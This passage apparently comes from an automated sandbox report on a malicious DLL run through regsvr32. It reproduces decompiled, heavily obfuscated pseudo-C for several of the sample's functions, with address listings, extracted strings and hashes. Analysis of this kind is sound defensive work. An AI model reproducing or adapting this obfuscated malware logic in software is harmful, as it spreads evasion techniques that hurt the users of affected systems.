				_v132 = _v132 / _t404;
				_v132 = _v132 >> 7;
				_v132 = _v132 >> 0xe;
				_v132 = _v132 ^ 0x000f2235;
				_v124 = 0xe1985f;
				_v124 = _v124 + 0xb544;
				_v124 = _v124 << 0xf;
				_v124 = _v124 << 0xb;
				_v124 = _v124 ^ 0x8c04bd37;
				_v28 = 0x909373;
				_t405 = 0x64;
				_v28 = _v28 * 0x16;
				_v28 = _v28 ^ 0x0c62ff59;
				_v72 = 0x542013;
				_v72 = _v72 + 0xffff0d3b;
				_v72 = _v72 >> 2;
				_v72 = _v72 ^ 0x0018b0aa;
				_v104 = 0x216e87;
				_v104 = _v104 * 0x25;
				_v104 = _v104 << 9;
				_v104 = _v104 ^ 0xa9fddd8c;
				_v136 = 0x46e51f;
				_v136 = _v136 | 0xcfc85329;
				_v136 = _v136 / _t405;
				_v136 = _v136 + 0xfffff93a;
				_v136 = _v136 ^ 0x0212eaef;
				_v68 = 0xbd68ce;
				_v68 = _v68 + 0xf8c1;
				_v68 = _v68 << 9;
				_v68 = _v68 ^ 0x7cc37aae;
				_v52 = 0x1217cf;
				_v52 = _v52 << 6;
				_v52 = _v52 ^ 0x048bf0dd;
				_v60 = 0x3b7dd8;
				_v60 = _v60 << 6;
				_v60 = _v60 + 0xffff140b;
				_v60 = _v60 ^ 0x0ed14952;
				_v24 = 0x1650d6;
				_v24 = _v24 << 2;
				_v24 = _v24 ^ 0x005d0390;
				_v92 = 0x8f2a44;
				_v92 = _v92 + 0xffff5260;
				_t406 = 0x6f;
				_v92 = _v92 * 0x1f;
				_v92 = _v92 ^ 0x1144c5a1;
				_v76 = 0x6e1288;
				_v76 = _v76 ^ 0x208cf071;
				_v76 = _v76 >> 0xb;
				_v76 = _v76 ^ 0x00038ccf;
				_v56 = 0xcb0a93;
				_v56 = _v56 << 0xf;
				_v56 = _v56 >> 0xf;
				_v56 = _v56 ^ 0x000c8c58;
				_v152 = 0xfa6999;
				_v152 = _v152 << 4;
				_v152 = _v152 << 5;
				_v152 = _v152 + 0xffff7973;
				_v152 = _v152 ^ 0xf4d38853;
				_v12 = 0xd6ef1b;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x0032ffd4;
				_v144 = 0xcd2a86;
				_v144 = _v144 << 0xe;
				_v144 = _v144 ^ 0xa497321c;
				_v144 = _v144 >> 0x10;
				_v144 = _v144 ^ 0x000a6840;
				_v40 = 0xb46d0a;
				_v40 = _v40 | 0x4023dc67;
				_v40 = _v40 ^ 0x40bd9278;
				_v116 = 0x3c7945;
				_v116 = _v116 >> 5;
				_v116 = _v116 + 0xe0e3;
				_v116 = _v116 << 8;
				_v116 = _v116 ^ 0x02c9185f;
				_v108 = 0x99e965;
				_v108 = _v108 << 3;
				_v108 = _v108 / _t406;
				_v108 = _v108 ^ 0x0000e106;
				_v64 = 0x868f0f;
				_t407 = 0x3b;
				_v64 = _v64 / _t407;
				_v64 = _v64 + 0x3938;
				_v64 = _v64 ^ 0x0004c254;
				while(1) {
					L1:
					_t378 = 0xc4544aa;
					do {
						if(_t395 == 0x4f0c58) {
							_t395 = 0x2979db8;
							goto L9;
						} else {
							if(_t395 == 0x2979db8) {
								_push(_v32);
								_push(_v112);
								_push(_v16);
								_t379 = E10004BB4(0x10001718, _v128);
								_push(_v48);
								_push(_v160);
								_push(_v156);
								E1000D68B(E10004BB4(0x100015e8, _v148), _v44, _v140, _t379, _v96,  &_v8, _v100);
								_t395 =  ==  ? 0xc4544aa : 0xf107e45;
								E1000B9D7(_v80, _v88, _t379, _v132);
								E1000B9D7(_v124, _v28, _t380, _v72);
								_t450 = _v4;
								_t455 =  &(_t455[0xf]);
								_t378 = 0xc4544aa;
								goto L9;
							} else {
								if(_t395 == 0x845ef81) {
									E1000D5CB(_v116, _v8, _v108, _v20, _v64);
								} else {
									if(_t395 != _t378) {
										goto L9;
									} else {
										_push(_v52);
										_push(_v68);
										_push(_v136);
										_t389 = E10004BB4(0x100015b8, _v104);
										_t390 =  *0x1002420c; // 0x0
										E1000B40A(_v120, _v60, 0x100015b8, _v24, _v92, _v76,  *_t450, _v56, _t390 + 0x50, _v152,  *((intOrPtr*)(_t450 + 4)), _v8, _t389);
										_t395 = 0x845ef81;
										_t454 =  ==  ? 1 : _t454;
										E1000B9D7(_v12, _v144, _t389, _v40);
										_t455 =  &(_t455[0x10]);
										goto L1;
									}
								}
							}
						}
						L12:
						return _t454;
						L9:
					} while (_t395 != 0xf107e45);
					goto L12;
				}
			}

0x1000508b
0x10005095
0x10005097
0x1000509e
0x100050ae
0x100050b0
0x100050b5
0x100050bf
0x100050c4
0x100050c9
0x100050cf
0x100050d4
0x100050dc
0x100050e7
0x100050ef
0x100050fa
0x10005106
0x1000510b
0x10005111
0x10005116
0x10005123
0x1000512b
0x10005130
0x10005138
0x10005140
0x1000514b
0x10005156
0x10005161
0x10005169
0x10005171
0x10005179
0x10005181
0x10005189
0x10005194
0x1000519f
0x100051aa
0x100051b2
0x100051ba
0x100051c2
0x100051ca
0x100051d5
0x100051e0
0x100051eb
0x100051f3
0x100051f7
0x100051fc
0x10005202
0x1000520e
0x10005211
0x10005215
0x1000521d
0x10005225
0x1000522d
0x10005235
0x1000523d
0x10005245
0x1000524d
0x10005255
0x1000525f
0x10005267
0x1000526f
0x1000527a
0x10005285
0x10005290
0x1000529b
0x100052a6
0x100052b1
0x100052bf
0x100052c4
0x100052ca
0x100052d2
0x100052da
0x100052e2
0x100052e7
0x100052ef
0x100052f7
0x100052ff
0x1000530c
0x1000530f
0x10005313
0x1000531b
0x10005323
0x1000532b
0x10005333
0x1000533b
0x1000534b
0x1000534f
0x10005354
0x10005359
0x10005361
0x10005369
0x10005371
0x10005376
0x1000537b
0x10005383
0x10005396
0x10005397
0x1000539e
0x100053a9
0x100053b1
0x100053b9
0x100053be
0x100053c6
0x100053d3
0x100053d7
0x100053dc
0x100053e4
0x100053ec
0x100053fa
0x100053fe
0x10005406
0x1000540e
0x10005416
0x1000541e
0x10005423
0x1000542b
0x10005433
0x10005438
0x10005440
0x10005448
0x1000544d
0x10005455
0x1000545d
0x10005468
0x10005472
0x1000547d
0x10005485
0x10005494
0x10005497
0x1000549b
0x100054a3
0x100054ab
0x100054b3
0x100054b8
0x100054c0
0x100054c8
0x100054cd
0x100054d2
0x100054da
0x100054e2
0x100054e7
0x100054ec
0x100054f4
0x100054fc
0x10005507
0x1000550f
0x1000551a
0x10005522
0x10005527
0x1000552f
0x10005534
0x1000553c
0x10005547
0x10005552
0x1000555d
0x10005565
0x1000556a
0x10005572
0x10005577
0x1000557f
0x10005587
0x10005594
0x10005598
0x100055a0
0x100055ac
0x100055af
0x100055b3
0x100055bb
0x100055c3
0x100055c3
0x100055c3
0x100055c8
0x100055ce
0x1000574a
0x00000000
0x100055d4
0x100055da
0x1000568d
0x10005699
0x1000569d
0x100056a8
0x100056ad
0x100056bb
0x100056bf
0x100056ec
0x10005718
0x1000571c
0x10005734
0x10005739
0x10005740
0x10005743
0x00000000
0x100055e0
0x100055e6
0x10005777
0x100055ec
0x100055ee
0x00000000
0x100055f4
0x100055f4
0x100055fd
0x10005601
0x10005609
0x10005622
0x10005652
0x1000566c
0x10005672
0x10005680
0x10005685
0x00000000
0x10005685
0x100055ee
0x100055e6
0x100055da
0x10005781
0x1000578b
0x1000574f
0x1000574f
0x00000000
0x1000575b

Strings

Ey<, xrefs: 1000555D
?, xrefs: 100051BA
C$L, xrefs: 100051F3
@h, xrefs: 10005534
89, xrefs: 100055B3
5y,, xrefs: 10005171
8R, xrefs: 10005130
KVq(, xrefs: 10005267
<, xrefs: 100050DC

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: <$89$8R$@h$C$L$Ey<$KVq($5y,$?
API String ID: 0-1528000342
Opcode ID: d1cc8876fa811917e439a22e578a0507606d7e9b8b3f2f09058de0b17fa3fca7
Instruction ID: 93a99c9dbfdcc50fa85949d5c0488ed50ab5ca6c72be1f91ba5371dbdf6187e5
Opcode Fuzzy Hash: d1cc8876fa811917e439a22e578a0507606d7e9b8b3f2f09058de0b17fa3fca7
Instruction Fuzzy Hash: 96F10E711097809FD3A8CF25C58AA4FBBF2FBC5748F108A1DF29986260D7B18959CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10004E77 Relevance: 11.4, Strings: 9, Instructions: 125
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10004E77() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				intOrPtr _t100;
				signed int _t106;
				char* _t107;
				void* _t110;
				signed int _t114;
				signed int _t126;
				signed int _t127;
				short* _t128;
				signed int* _t131;

				_t131 =  &_v572;
				_v524 = _v524 & 0x00000000;
				_v532 = 0x48eb19;
				_t110 = 0xa942412;
				_v528 = 0x94fe1;
				_v564 = 0x15893c;
				_v564 = _v564 + 0xffff5433;
				_v564 = _v564 + 0xa3cc;
				_v564 = _v564 ^ 0x0017a26b;
				_v552 = 0xa8a68c;
				_v552 = _v552 << 7;
				_v552 = _v552 ^ 0x5451337b;
				_v544 = 0x264573;
				_t18 =  &_v544; // 0x264573
				_v544 =  *_t18 * 0x58;
				_v544 = _v544 ^ 0x0d2822b3;
				_v572 = 0xecf6d0;
				_t126 = 0x45;
				_v572 = _v572 / _t126;
				_v572 = _v572 + 0x7127;
				_t127 = 0xa;
				_v572 = _v572 / _t127;
				_v572 = _v572 ^ 0x0009b8ec;
				_v568 = 0xf2c400;
				_v568 = _v568 * 0x4a;
				_v568 = _v568 * 0x51;
				_v568 = _v568 ^ 0x342026c6;
				_v540 = 0x8f05a0;
				_v540 = _v540 ^ 0x23885da1;
				_v540 = _v540 ^ 0x2300f9f9;
				_v536 = 0x5b2969;
				_v536 = _v536 >> 0xc;
				_v536 = _v536 ^ 0x0000313b;
				_v556 = 0xa3dec9;
				_v556 = _v556 << 4;
				_v556 = _v556 ^ 0x0a3a2024;
				_t61 =  &_v556; // 0xa3a2024
				_t128 =  *_t61;
				_v548 = 0x94ffa8;
				_v548 = _v548 + 0xfffffe80;
				_v548 = _v548 ^ 0x009cd3db;
				L1:
				while(_t110 != 0x53badc3) {
					if(_t110 == 0x983d547) {
						_v560 = 0x15782a;
						_t114 = 0x5f;
						_v560 = _v560 / _t114;
						_v560 = _v560 ^ 0x000039d8;
						_t106 = E1001ADE9(_v572, _v568, _v540, _v536,  &_v520);
						_t131 =  &(_t131[3]);
						_t128 =  &_v520 + _t106 * 2;
						while(1) {
							_t107 =  &_v520;
							if(_t128 <= _t107) {
								break;
							}
							if( *_t128 != 0x5c) {
								L10:
								_t128 = _t128 - 2;
								continue;
							} else {
								_t88 =  &_v560;
								 *_t88 = _v560 - 1;
								if( *_t88 == 0) {
									_t128 = _t128 + 2;
								} else {
									goto L10;
								}
							}
							L14:
							_t110 = 0x53badc3;
							goto L1;
						}
						goto L14;
					} else {
						if(_t110 == 0xa942412) {
							_t110 = 0xcd0b343;
							continue;
						} else {
							if(_t110 == 0xcd0b343) {
								_t70 =  &_v564; // 0xa3a2024
								_t107 = E10009574( *_t70,  &_v520, _v552, _v544);
								_t131 =  &(_t131[3]);
								_t110 = 0x983d547;
								continue;
							}
						}
					}
					L16:
					if(_t110 != 0xa3e7e5b) {
						continue;
					}
					return _t107;
				}
				_t100 =  *0x10024208; // 0x49d848
				E100207BB(_v556, _t128, _t100 + 0x210, _v548);
				_t110 = 0xa3e7e5b;
				goto L16;
			}

0x10004e77
0x10004e7d
0x10004e84
0x10004e8c
0x10004e91
0x10004e99
0x10004ea1
0x10004ea9
0x10004eb1
0x10004eb9
0x10004ec1
0x10004ec6
0x10004ece
0x10004ed6
0x10004edf
0x10004ee8
0x10004ef5
0x10004f08
0x10004f0d
0x10004f13
0x10004f1f
0x10004f22
0x10004f26
0x10004f2e
0x10004f3b
0x10004f44
0x10004f48
0x10004f50
0x10004f58
0x10004f60
0x10004f68
0x10004f70
0x10004f75
0x10004f7d
0x10004f85
0x10004f8a
0x10004f92
0x10004f92
0x10004f96
0x10004f9e
0x10004fa6
0x00000000
0x10004fae
0x10004fb8
0x10004feb
0x10004ffb
0x10004ffe
0x10005006
0x1000501f
0x10005028
0x1000502b
0x1000503f
0x1000503f
0x10005045
0x00000000
0x00000000
0x10005034
0x1000503c
0x1000503c
0x00000000
0x10005036
0x10005036
0x10005036
0x1000503a
0x10005049
0x00000000
0x00000000
0x00000000
0x1000503a
0x1000504c
0x1000504c
0x00000000
0x1000504c
0x00000000
0x10004fba
0x10004fc0
0x10004fe7
0x00000000
0x10004fc2
0x10004fc4
0x10004fd6
0x10004fdb
0x10004fe0
0x10004fe3
0x00000000
0x10004fe3
0x10004fc4
0x10004fc0
0x10005074
0x1000507a
0x00000000
0x00000000
0x1000508a
0x1000508a
0x10005057
0x10005068
0x1000506f
0x00000000

Strings

;1, xrefs: 10004F75
'q, xrefs: 10004F13
$ :sE&, xrefs: 10004F92
O, xrefs: 10004E91
sE&, xrefs: 10004ED6
[~>, xrefs: 10005074
[~>, xrefs: 1000506F
{3QT, xrefs: 10004EC6
i)[, xrefs: 10004F68

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $ :sE&$'q$;1$[~>$[~>$i)[$sE&${3QT$O
API String ID: 0-2484267659
Opcode ID: 816a212d87eb62b5cb27ebb848e88f9d79f870ecb818fdeb21365fa1284c0b44
Instruction ID: bb0e6049102f16b740f29c96853bc3f756444f9f3ba042d565728bf0a990efa3
Opcode Fuzzy Hash: 816a212d87eb62b5cb27ebb848e88f9d79f870ecb818fdeb21365fa1284c0b44
Instruction Fuzzy Hash: FF5178B19083429FD714CF20D58991FBBE1FBC8798F10492DF589A6260D7B59A09CF87

Uniqueness

Uniqueness Score: -1.00%

Function 100147D2 Relevance: 10.4, Strings: 8, Instructions: 403
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E100147D2(intOrPtr* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v52;
				char* _v56;
				intOrPtr _v92;
				char _v96;
				char _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr _v116;
				char _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				unsigned int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				unsigned int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				void* _t377;
				void* _t414;
				void* _t418;
				signed int _t421;
				intOrPtr _t430;
				intOrPtr* _t436;
				void* _t438;
				void* _t444;
				void* _t445;
				char* _t488;
				signed int _t494;
				signed int _t495;
				signed int _t496;
				signed int _t497;
				signed int _t498;
				signed int _t499;
				signed int _t500;
				signed int _t501;
				signed int _t502;
				signed int _t503;
				intOrPtr _t504;
				void* _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				void* _t508;
				char* _t509;
				intOrPtr* _t510;
				void* _t511;
				void* _t512;
				void* _t513;
				void* _t517;

				_t506 = _a12;
				_t436 = __edx;
				_push(_t506);
				_push(_a8);
				_t510 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t377);
				_v276 = 0x31b4f5;
				_t512 = _t511 + 0x14;
				_v276 = _v276 ^ 0x80880f0f;
				_v276 = _v276 << 0xd;
				_t438 = 0x68fc6f0;
				_v276 = _v276 + 0xcceb;
				_v276 = _v276 ^ 0x37800cab;
				_v208 = 0x968571;
				_v208 = _v208 ^ 0xdeb803ff;
				_v208 = _v208 + 0xcea8;
				_v208 = _v208 ^ 0xde2f5576;
				_v132 = 0x10f293;
				_v132 = _v132 >> 2;
				_v132 = _v132 ^ 0x00025888;
				_v220 = 0x96388f;
				_t494 = 0x6c;
				_v220 = _v220 / _t494;
				_v220 = _v220 + 0x3c6c;
				_v220 = _v220 ^ 0x00009ae6;
				_v128 = 0x28c527;
				_v128 = _v128 ^ 0x4d72d1bc;
				_v128 = _v128 ^ 0x4d5c68ab;
				_v152 = 0x5c0037;
				_v152 = _v152 + 0xc0ec;
				_v152 = _v152 ^ 0x005545fd;
				_v180 = 0xa1d5b7;
				_t495 = 0x4d;
				_v112 = _v112 & 0x00000000;
				_v180 = _v180 * 0x53;
				_v180 = _v180 + 0x7618;
				_v180 = _v180 ^ 0x3475e730;
				_v212 = 0x164f88;
				_v212 = _v212 + 0xfffff4ec;
				_v212 = _v212 + 0x22cf;
				_v212 = _v212 ^ 0x00125628;
				_v204 = 0x13cf1c;
				_v204 = _v204 >> 0xc;
				_v204 = _v204 << 0xf;
				_v204 = _v204 ^ 0x00985a80;
				_v160 = 0x405909;
				_t70 =  &_v160; // 0x405909
				_v160 =  *_t70 * 0xc;
				_v160 = _v160 ^ 0x030f808a;
				_v248 = 0x5c4bfd;
				_v248 = _v248 + 0x2cd6;
				_v248 = _v248 * 0x4e;
				_v248 = _v248 + 0xffff1ed8;
				_v248 = _v248 ^ 0x1c2677d2;
				_v272 = 0x53d192;
				_v272 = _v272 / _t495;
				_v272 = _v272 + 0xffff7a7c;
				_v272 = _v272 << 0xb;
				_v272 = _v272 ^ 0x0481410e;
				_v256 = 0xab470b;
				_v256 = _v256 ^ 0xf6eceffb;
				_v256 = _v256 + 0x8116;
				_v256 = _v256 >> 1;
				_v256 = _v256 ^ 0x7b216a4e;
				_v232 = 0x5f977f;
				_v232 = _v232 + 0x618e;
				_v232 = _v232 + 0xffff5dfe;
				_v232 = _v232 << 2;
				_v232 = _v232 ^ 0x017261a1;
				_v264 = 0xb9ccb;
				_t496 = 0xe;
				_v264 = _v264 / _t496;
				_t497 = 0x33;
				_v264 = _v264 / _t497;
				_v264 = _v264 << 2;
				_v264 = _v264 ^ 0x000bf850;
				_v172 = 0x344192;
				_v172 = _v172 + 0xfc34;
				_v172 = _v172 ^ 0x00379f2a;
				_v144 = 0x521102;
				_v144 = _v144 << 4;
				_v144 = _v144 ^ 0x052b1251;
				_v136 = 0x5bb35a;
				_t498 = 0x35;
				_v136 = _v136 * 0x1a;
				_v136 = _v136 ^ 0x095ef070;
				_v260 = 0x9a2501;
				_v260 = _v260 >> 9;
				_v260 = _v260 ^ 0x83d339c8;
				_v260 = _v260 ^ 0x4d03d18f;
				_v260 = _v260 ^ 0xced08c74;
				_v216 = 0x4ba4eb;
				_v216 = _v216 | 0x336b85e1;
				_v216 = _v216 >> 2;
				_v216 = _v216 ^ 0x0cd0b21b;
				_v268 = 0x154409;
				_v268 = _v268 << 1;
				_v268 = _v268 | 0xf849da61;
				_v268 = _v268 / _t498;
				_v268 = _v268 ^ 0x04a16919;
				_v252 = 0xe61b78;
				_v252 = _v252 | 0xdfb6c7fd;
				_v252 = _v252 ^ 0xdff9206b;
				_v148 = 0x9f3123;
				_t499 = 0xd;
				_v148 = _v148 / _t499;
				_v148 = _v148 ^ 0x000fd7b7;
				_v140 = 0x960ab1;
				_v140 = _v140 + 0xffff0f5f;
				_v140 = _v140 ^ 0x009932f1;
				_v236 = 0x298969;
				_v236 = _v236 | 0xbd8fee7d;
				_v236 = _v236 + 0xffff73b8;
				_t500 = 0x18;
				_v236 = _v236 / _t500;
				_v236 = _v236 ^ 0x07e1126c;
				_v244 = 0x1bab92;
				_v244 = _v244 + 0xffffb4e0;
				_v244 = _v244 >> 0xc;
				_v244 = _v244 << 0x10;
				_v244 = _v244 ^ 0x01b36144;
				_v164 = 0x213d53;
				_v164 = _v164 << 3;
				_v164 = _v164 ^ 0x0105b92a;
				_v168 = 0x1c2094;
				_t501 = 0x2c;
				_v168 = _v168 * 0x4c;
				_v168 = _v168 ^ 0x0853a20e;
				_v184 = 0x9b5c4a;
				_v184 = _v184 >> 6;
				_v184 = _v184 >> 9;
				_v184 = _v184 ^ 0x00071f0a;
				_v156 = 0x490878;
				_v156 = _v156 ^ 0x7c71bd9f;
				_v156 = _v156 ^ 0x7c3b53a2;
				_v192 = 0xe8b9ac;
				_v192 = _v192 + 0xf5b4;
				_v192 = _v192 ^ 0x93ae5fe0;
				_v192 = _v192 ^ 0x9347edb9;
				_v224 = 0x5b2ff3;
				_v224 = _v224 | 0x2c3ab4b9;
				_v224 = _v224 << 0xe;
				_v224 = _v224 ^ 0xefff6b2e;
				_v196 = 0xe7f9e0;
				_v196 = _v196 + 0xa806;
				_v196 = _v196 ^ 0x7097e17c;
				_v196 = _v196 ^ 0x7075fef3;
				_v200 = 0xe0d6d5;
				_v200 = _v200 * 0x5b;
				_v200 = _v200 / _t501;
				_v200 = _v200 ^ 0x01dabfc1;
				_v228 = 0x9f2351;
				_v228 = _v228 << 2;
				_t502 = 0x50;
				_v228 = _v228 / _t502;
				_v228 = _v228 + 0xffffc26b;
				_v228 = _v228 ^ 0x0001c519;
				_v176 = 0xa606b9;
				_v176 = _v176 << 6;
				_v176 = _v176 >> 0xd;
				_v176 = _v176 ^ 0x00075156;
				_v188 = 0x5dfe7d;
				_v188 = _v188 | 0xe5bef956;
				_v188 = _v188 ^ 0xe5ffff6f;
				_v240 = 0x5d4946;
				_v240 = _v240 | 0x56748dbe;
				_v240 = _v240 ^ 0x4151f460;
				_t503 = 0xa;
				_v240 = _v240 / _t503;
				_v240 = _v240 ^ 0x02513876;
				while(1) {
					L1:
					_t504 = _v124;
					while(1) {
						L2:
						_t517 = _t438 - 0x92e9aef;
						if(_t517 > 0) {
							break;
						}
						if(_t517 == 0) {
							_t421 = E1001A4B5(_v204, _v160,  &_v104, _v248,  &_v120, _v272);
							_t512 = _t512 + 0x10;
							asm("sbb ecx, ecx");
							_t438 = ( ~_t421 & 0x0044bda6) + 0xcef64ea;
							continue;
						}
						if(_t438 == 0x2e15747) {
							_v92 = _t506;
							_v56 =  &_v32;
							_v40 =  *_t436;
							_v36 =  *((intOrPtr*)(_t436 + 4));
							_v52 = 0x20;
							if(E10004342(_v180,  &_v104, _v212,  &_v96) == 0) {
								L31:
								return _v112;
							}
							_t438 = 0x92e9aef;
							continue;
						}
						if(_t438 == 0x4d0ce73) {
							E10006A8D(_v196, _v200, _v120);
							_t438 = 0xcef64ea;
							continue;
						}
						if(_t438 == 0x68fc6f0) {
							_t438 = 0xd01a1fe;
							continue;
						}
						if(_t438 != 0x7bd032f) {
							L28:
							if(_t438 == 0xd31f1c0) {
								goto L31;
							}
							goto L1;
						}
						_push(_t438);
						_t430 = E1001EAA3(_a4);
						 *_t510 = _t430;
						if(_t430 == 0) {
							_t438 = 0x4d0ce73;
						} else {
							_v112 = 1;
							_t438 = 0xbcce2a4;
						}
					}
					if(_t438 == 0xbcce2a4) {
						_t507 =  *_t510;
						E10008BCB(_v260, _v216, _v268, _t507);
						_t508 = _t507 + _v208;
						E10011D1C(_v116, _v252, _v148, _v140, _t508, _v120);
						_t509 = _t508 + _v116;
						E10021A1E(_t509, _v236, _v244, _v164, _t504, _v168);
						_t513 = _t512 + 0x28;
						_t505 = 0;
						_v108 = _v108 & 0;
						_t488 = _t509;
						_t444 =  >  ? _v108 : _t509 + _t504 - _t509;
						if(_t444 == 0) {
							L27:
							_push(0);
							_t445 = 0xe;
							_t414 = E1000D763(_t445);
							_t512 = _t513 - 0xc + 0x10;
							_t438 = 0x4d0ce73;
							 *((char*)(_t414 + _t509)) = 0;
							_t506 = _a12;
							goto L28;
						} else {
							goto L24;
						}
						do {
							L24:
							if( *_t488 == 0) {
								 *_t488 = 0xc3;
							}
							_t488 = _t488 + 1;
							_t505 = _t505 + 1;
						} while (_t505 < _t444);
						goto L27;
					}
					if(_t438 == 0xcef64ea) {
						E10006A8D(_v228, _v176, _v104);
						goto L31;
					}
					if(_t438 == 0xd01a1fe) {
						_push( &_v32);
						_t418 = E1000E379(_v132,  *_t436, _v220, _t438,  *((intOrPtr*)(_t436 + 4)), _v128, _v152);
						_t512 = _t512 + 0x18;
						if(_t418 == 0) {
							goto L31;
						}
						_t438 = 0x2e15747;
						goto L2;
					}
					if(_t438 != 0xd342290) {
						goto L28;
					}
					_t504 = E1000D763(_v240, _v188);
					_t512 = _t512 - 0xc + 0x10;
					_v124 = _t504;
					_a4 = _v276 + _v116 + _t504;
					_t438 = 0x7bd032f;
					goto L2;
				}
			}

0x100147db
0x100147e2
0x100147e5
0x100147e6
0x100147ed
0x100147ef
0x100147f6
0x100147f7
0x100147f8
0x100147fd
0x10014805
0x10014808
0x10014812
0x10014817
0x1001481c
0x10014824
0x1001482c
0x10014834
0x1001483c
0x10014844
0x1001484c
0x10014857
0x1001485f
0x1001486a
0x10014878
0x1001487d
0x10014883
0x1001488b
0x10014893
0x1001489e
0x100148a9
0x100148b4
0x100148bf
0x100148ca
0x100148d5
0x100148e2
0x100148e3
0x100148eb
0x100148ef
0x100148f7
0x100148ff
0x10014907
0x1001490f
0x10014917
0x1001491f
0x10014927
0x1001492c
0x10014931
0x10014939
0x10014944
0x1001494c
0x10014953
0x1001495e
0x10014966
0x10014973
0x10014977
0x1001497f
0x10014987
0x10014995
0x10014999
0x100149a1
0x100149a6
0x100149ae
0x100149b6
0x100149be
0x100149c6
0x100149ca
0x100149d2
0x100149dc
0x100149e4
0x100149ec
0x100149f1
0x100149f9
0x10014a07
0x10014a0c
0x10014a16
0x10014a1b
0x10014a21
0x10014a26
0x10014a2e
0x10014a39
0x10014a44
0x10014a4f
0x10014a5a
0x10014a62
0x10014a6d
0x10014a80
0x10014a83
0x10014a8a
0x10014a95
0x10014a9d
0x10014aa2
0x10014aaa
0x10014ab2
0x10014aba
0x10014ac2
0x10014aca
0x10014acf
0x10014ad7
0x10014adf
0x10014ae3
0x10014af3
0x10014af7
0x10014aff
0x10014b07
0x10014b0f
0x10014b17
0x10014b29
0x10014b2e
0x10014b37
0x10014b42
0x10014b4d
0x10014b58
0x10014b63
0x10014b6b
0x10014b73
0x10014b7f
0x10014b82
0x10014b86
0x10014b8e
0x10014b96
0x10014b9e
0x10014ba3
0x10014ba8
0x10014bb0
0x10014bbb
0x10014bc3
0x10014bce
0x10014be5
0x10014be8
0x10014bef
0x10014bfa
0x10014c02
0x10014c07
0x10014c0c
0x10014c14
0x10014c1f
0x10014c2a
0x10014c35
0x10014c3d
0x10014c45
0x10014c4d
0x10014c55
0x10014c5d
0x10014c65
0x10014c6a
0x10014c72
0x10014c7a
0x10014c82
0x10014c8a
0x10014c92
0x10014c9f
0x10014cab
0x10014caf
0x10014cb7
0x10014cbf
0x10014cc8
0x10014ccd
0x10014cd3
0x10014cdb
0x10014ce3
0x10014ceb
0x10014cf0
0x10014cf5
0x10014cfd
0x10014d05
0x10014d0d
0x10014d15
0x10014d1d
0x10014d25
0x10014d31
0x10014d34
0x10014d38
0x10014d40
0x10014d40
0x10014d40
0x10014d47
0x10014d47
0x10014d47
0x10014d4d
0x00000000
0x00000000
0x10014d53
0x10014e61
0x10014e66
0x10014e6d
0x10014e75
0x00000000
0x10014e75
0x10014d5f
0x10014de2
0x10014de9
0x10014df9
0x10014e03
0x10014e1a
0x10014e2e
0x1001501f
0x10015030
0x10015030
0x10014e34
0x00000000
0x10014e34
0x10014d67
0x10014dcb
0x10014dd1
0x00000000
0x10014dd1
0x10014d6f
0x10014db5
0x00000000
0x10014db5
0x10014d77
0x10014ffd
0x10015003
0x00000000
0x00000000
0x00000000
0x10015005
0x10014d8b
0x10014d8f
0x10014d94
0x10014d9a
0x10014dae
0x10014d9c
0x10014d9c
0x10014da7
0x10014da7
0x10014d9a
0x10014e86
0x10014f33
0x10014f43
0x10014f4c
0x10014f6f
0x10014f7b
0x10014f94
0x10014f9c
0x10014f9f
0x10014fa3
0x10014fae
0x10014fb0
0x10014fba
0x10014fca
0x10014fdd
0x10014fe4
0x10014fe5
0x10014fea
0x10014fed
0x10014ff2
0x10014ff6
0x00000000
0x00000000
0x00000000
0x00000000
0x10014fbc
0x10014fbc
0x10014fbf
0x10014fc1
0x10014fc1
0x10014fc4
0x10014fc5
0x10014fc6
0x00000000
0x10014fbc
0x10014e92
0x10015019
0x00000000
0x1001501e
0x10014e9e
0x10014ef9
0x10014f19
0x10014f1e
0x10014f23
0x00000000
0x00000000
0x10014f29
0x00000000
0x10014f29
0x10014ea6
0x00000000
0x00000000
0x10014ed0
0x10014ed9
0x10014ede
0x10014ee5
0x10014ee8
0x00000000
0x10014ee8

Strings

FI], xrefs: 10014D15
, xrefs: 10014E1A
